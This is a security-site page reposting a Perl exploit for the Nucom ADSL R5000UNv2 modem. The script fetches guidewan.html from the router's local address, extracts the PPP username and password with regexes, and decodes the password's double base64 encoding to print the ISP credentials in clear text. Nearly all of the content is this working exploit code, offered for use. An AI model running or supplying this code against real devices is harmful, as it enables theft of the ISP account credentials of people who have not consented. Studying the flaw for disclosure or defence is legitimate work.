首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Nucom ADSL ADSLR5000UN ISP Credentials Disclosure 来源：vfocus.net 作者：Magof 发布时间：2014-09-26   #!/usr/bin/perl # Exploit Author: Sebastián Magof # Hardware: Modem Nucom ADSL R5000UNv2  # Software Version: R5TC008 # Vulnerable file: guidewan.html # location: http://gateway/telecom_GUI/guidewan.html                  # Bug: ISP usr+pwd disclosure # Type: Local # Date: 24/09/2014 # Vendor Homepage: http://www.nucom.hk/ # Version: 2.00(R5TC008) # Tested on: Linux Fedora 20/Windows 7 # (\/) # (**) Alpha (: #(")(") #MADE IN ARGENTINA; #usage:perl exploit.pl use LWP::UserAgent; use HTTP::Request; use MIME::Base64; #begin print "\n\n************************************************************\n"; print "* Modem Nucom ADSL R5000UNv2 ISP credentials disclosure    *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) print "************************************************************\n\n";   #isp pwd disclosure file my $url = "http://192.168.1.1/telecom_GUI/guidewan.html";      #UserAgent my $ua = LWP::UserAgent->new(); $ua->agent("Mozilla/5.0");      #Request. my $req = HTTP::Request->new(GET => $url); my $request = $ua->request($req); my $content = $request->content(); #content my ($pwd) = $content =~ m/pppPassword.value = '(.+)';/; my ($usr) = $content =~ m/pppUserName.value = '(.+)';/; #decode base64 2 times pwd; $encoded = $pwd; $decoded = decode_base64($encoded); #decode base64 pwd; $decoded2 = decode_base64($decoded); #2nd base64 pwd; #ISP usr+pwd Arnet Telecom Argentina; print "User: $usr\n"; print "Password: $decoded2\n\n"; exit(0);     __EOF__   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·GNU bash Environment Variable ·Mac OS X VMWare Fusion Root Pr ·GNU bash Environment Variable ·Perl 5.20.1 Deep Recursion Sta ·Bash Environment Variable Comm ·Apache mod_cgi Bash Environmen ·Bash Code Injection Proof Of C ·DHCP Client Bash Environment V ·Advantech WebAccess dvs.ocx Ge ·Gnu Bash 4.3 CGI Scan Remote C ·EMC AlphaStor Device Manager O ·Gnu Bash 4.3 CGI REFERER Comma   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved